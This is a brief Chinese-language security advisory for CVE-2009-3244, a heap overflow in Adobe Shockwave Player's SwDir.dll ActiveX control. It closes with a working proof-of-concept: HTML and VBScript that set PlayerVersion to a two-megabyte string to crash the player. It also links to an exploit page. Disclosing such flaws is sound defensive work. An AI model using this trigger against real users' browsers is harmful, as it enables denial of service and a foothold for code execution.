CVE ID: CVE-2009-3244
Adobe Shockwave Player是专门播放使用Director Shockwave Studio制作的网页的外挂软件。
Shockwave Player所提供的SwDir.dll ActiveX控件在播放恶意网页文件时存在堆溢出漏洞,用户受骗打开了包含有超长PlayerVersion属性值的HTML文件时就可能触发这个溢出,导致拒绝服务或执行任意代码。
Adobe Shockwave Player 11.5.1.601
临时解决方法:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2097152, "A")
ShockW.PlayerVersion = arg1
</script>
http://sebug.net/exploit/12322/